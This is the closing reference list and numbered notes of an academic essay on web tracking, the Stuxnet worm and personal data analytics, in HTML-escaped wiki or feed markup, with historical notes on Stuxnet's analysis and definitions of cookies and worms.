Langner, R. (2011) Ralph Langner: Cracking Stuxnet, a 21st-century cyberweapon, accessed 02/03/2012, http://www.youtube.com/watch?feature=player_embedded&amp;amp;amp;v=CS01Hmjv1pQ &lt;br /&gt;
&lt;br /&gt;
Luma (2010) Display Advertising Technology Landscape, accessed 02/03/2012, http://www.lunapartners.com &lt;br /&gt;
&lt;br /&gt;
Madrigal, A. (2012) I'm Being Followed: How Google—and 104 Other Companies—Are Tracking Me on the Web, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/02/im-being-followed-how-google-and-104-other-companies-are-tracking-me-on-the-web/253758/ &lt;br /&gt;
&lt;br /&gt;
Markoff, J. and Sanger, D. E. (2010) In a Computer Worm, a Possible Biblical Clue, ''The New York Times'', accessed 04/03/2012, http://www.nytimes.com/2010/09/30/world/middleeast/30worm.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
Matrosov, A., Rodionov, E., Harley, D. and Malcho, J. (n.d.) Stuxnet Under the Microscope, accessed 04/03/2012, http://go.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf &lt;br /&gt;
&lt;br /&gt;
Mitcham, C. (1998) The Importance of Philosophy to Engineering, ''Teorema'', Vol. XVII/3, pp. 27-47. &lt;br /&gt;
&lt;br /&gt;
Mittal, S. (2010) User Privacy and the Evolution of Third-party Tracking Mechanisms on the World Wide Web, Thesis, accessed 04/03/2012, http://www.stanford.edu/~sonalm/Mittal_Thesis.pdf &lt;br /&gt;
&lt;br /&gt;
Mmpc2 (2010) The Stuxnet Sting, accessed 04/03/2012, http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx &lt;br /&gt;
&lt;br /&gt;
Peterson, D. G. (2012) Langner’s Stuxnet Deep Dive S4 Video, accessed 04/03/2012, http://www.digitalbond.com/2012/01/31/langners-stuxnet-deep-dive-s4-video/ &lt;br /&gt;
&lt;br /&gt;
Pew (2012) Search Engine Use 2012, accessed 09/03/2012, http://pewinternet.org/Reports/2012/Search-Engine-Use-2012/Summary-of-findings.aspx &lt;br /&gt;
&lt;br /&gt;
Rieland, R. (2012) So What Do We Do With All This Data?, ''The Smithsonian'', accessed 04/03/2012, http://blogs.smithsonianmag.com/ideas/2012/01/so-what-do-we-do-with-all-this-data/ &lt;br /&gt;
&lt;br /&gt;
Sense (2012) Feel. Act. Make sense, accessed 04/03/2012, http://open.sen.se/ &lt;br /&gt;
&lt;br /&gt;
Tugend, A. (2012) Bad Habits? My Future Self Will Deal With That, accessed 04/03/2012, http://www.nytimes.com/2012/02/25/business/another-theory-on-why-bad-habits-are-hard-to-break-shortcuts.html?_r=3&amp;amp;amp;pagewanted=all &lt;br /&gt;
&lt;br /&gt;
W3C (2012) Tracking Protection Working Group, accessed 14/03/2012, http://www.w3.org/2011/tracking-protection/ &lt;br /&gt;
&lt;br /&gt;
Wolfram, S. (2012) The Personal Analytics of My Life, accessed 09/03/2012, http://blog.stephenwolfram.com/2012/03/the-personal-analytics-of-my-life/ &lt;br /&gt;
&lt;br /&gt;
Yarrow, J. (2011) CHART OF THE DAY: Here's How Much A Unique Visitor Is Worth, ''Business Insider'', accessed 02/03/2012, http://www.businessinsider.com/chart-of-the-day-revenue-per-unique-visitor-2011-1 &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2010) Blockbuster Worm Aimed for Infrastructure, But No Proof Iran Nukes Were Target, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/09/stuxnet/ &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2011) Report Strengthens Suspicions That Stuxnet Sabotaged Iran’s Nuclear Plant, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/12/isis-report-on-stuxnet/ &lt;br /&gt;
&lt;br /&gt;
== Notes  ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[1] These include HTTP cookies, Locally Stored Objects (LSOs), and Document Object Model storage (DOM storage). &lt;br /&gt;
&lt;br /&gt;
[2] ‘Cookies are small pieces of text that servers can set and read from a client computer in order to register its “state.” They have strictly specified structures and can contain no more than 4 KB of data each. When a user navigates to a particular domain, the domain may call a script to set a cookie on the user’s machine. The browser will send this cookie in all subsequent communication between the client and the server until the cookie expires or is reset by the server’ (Mittal 2010: 10). &lt;br /&gt;
&lt;br /&gt;
[3] Ghostery describes itself on its help page: “Be a web detective. Ghostery is your window into the invisible web – tags, web bugs, pixels and beacons that are included on web pages in order to get an idea of your online behavior. Ghostery tracks the trackers and gives you a roll-call of the ad networks, behavioral data providers, web publishers, and other companies interested in your activity” (Ghostery 2012a). &lt;br /&gt;
&lt;br /&gt;
[4] For an example see, http://static.chartbeat.com/js/chartbeat.js &lt;br /&gt;
&lt;br /&gt;
[5] Also see examples at: (1) Chartbeat: http://static.chartbeat.com/js/chartbeat.js ; (2) Google Analytics: http://www.google-analytics.com/ga.js ; (3) Omniture: http://o.aolcdn.com/omniunih.js ; (4) Advertising.com: http://o.aolcdn.com/ads/adsWrapper.js &lt;br /&gt;
&lt;br /&gt;
[6] A computer worm is technically similar in design to a virus and is therefore considered to be a sub-class of a virus. Indeed, worms spread from computer to computer, often across networks, but unlike a virus, a worm has the ability to transfer itself without requiring any human action. A worm is able to do this by taking advantage of the file or information transport features, such as the networking setup, on a computer, which it exploits to enable it to travel from computer to computer unaided. &lt;br /&gt;
&lt;br /&gt;
[7] One of the ways in which the Stuxnet attack target was identified was through a close reading of the computer code that was disassembled from the worm and careful analysis of the internal data structures and finite state machine used to structure the attack. Ironically, this was then matched by Ralph Langner with photographs that had been uploaded to the website of the President of Iran, Mahmoud Ahmadinejad; the importance of the cascade structure, centrifuge layout and the enriching process was confirmed by careful analysis of background images accidentally photographed on computers used by the president, see http://www.president.ir/en/9172 (see Peterson 2012). &lt;br /&gt;
&lt;br /&gt;
[8] The timestamp in the file ~wtr4141.tmp indicates that the date of compilation was on 03/02/2010 (Matrosov et al n.d.). Although there is suspicion that there may be three versions of the Stuxnet code in response to its discovery: “Most curious, there were two major variants of the worm. The earliest versions of it, which appear to have been released in the summer of 2009, were extremely sophisticated in some ways but fairly primitive in others, compared with the newer version, which seems to have first circulated in March 2010. A third variant, containing minor improvements, appeared in April. In Schouwenberg’s view, this may mean that the authors thought Stuxnet wasn’t moving fast enough, or had not hit its target, so they created a more aggressive delivery mechanism. The authors, he thinks, weighed the risk of discovery against the risk of a mission failure and chose the former” (Gross 2011). &lt;br /&gt;
&lt;br /&gt;
[9] There are some criticisms that this link may be spurious; for instance, Cryptome (2010) argues that it may be that the &amp;quot;myrtus&amp;quot; string from the recovered Stuxnet file path &amp;quot;b:\myrtus\src\objfre_w2k_x86\i386\guava.pdb&amp;quot; stands for &amp;quot;My-RTUs&amp;quot;, as in Remote Terminal Unit. &lt;br /&gt;
&lt;br /&gt;
[10] After having performed detailed analysis of the Duqu code, Kaspersky Labs stated that they “are 100% confident that the Duqu Framework was not programmed with Visual C++. It is possible that its authors used an in-house framework to generate intermediary C code, or they used another completely different programming language” (Evans 2012). &lt;br /&gt;
&lt;br /&gt;
[11] See http://quantifiedself.com/ &lt;br /&gt;
&lt;br /&gt;
[12] Wolfram further writes: “It’s amazing how much it’s possible to figure out by analyzing the various kinds of data I’ve kept. And in fact, there are many additional kinds of data I haven’t even touched on in this post. I’ve also got years of curated medical test data (as well as my not-yet-very-useful complete genome), GPS location tracks, room-by-room motion sensor data, endless corporate records—and much much more…And as I think about it all, I suppose my greatest regret is that I did not start collecting more data earlier. I have some backups of my computer filesystems going back to 1980. And if I look at the 1.7 million files in my current filesystem, there’s a kind of archeology one can do, looking at files that haven’t been modified for a long time (the earliest is dated June 29, 1980)” (Wolfram 2012). &lt;br /&gt;
&lt;br /&gt;
[13] Some examples of visualization software for this kind of life-streaming quantification and visualization are shown on these pages from the Quantified Self website: http://quantifiedself.com/2011/03/personal-data-visualization/ , http://quantifiedself.com/2010/05/jaw-dropping-infographics-for/ , http://quantifiedself.com/2010/05/the-visualization-zoo/ , http://quantifiedself.com/2009/09/visualization-inspiration/ &lt;br /&gt;
&lt;br /&gt;
[14] See http://open.sen.se/ for a particularly good example of this: “Make your data history meaningful. Privately store your flows of information and use rich visualizations and mashup tools to understand what's going on” (Sense 2012). &lt;br /&gt;
&lt;br /&gt;
[15] ''Compactants'': computational actants, drawing the notion of actant from actor-network theory. I also like the association with companion actants, similar in idea to companion species. &lt;br /&gt;
&lt;br /&gt;
[16] Here I tentatively raise the suggestion that a future critical theory of code and software is committed to ''un-building'', ''dis-assembling'', and ''de-formation'' of existing code/software systems, together with a necessary intervention in terms of a positive moment in the formation and composition of future and alternative systems.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
</feed>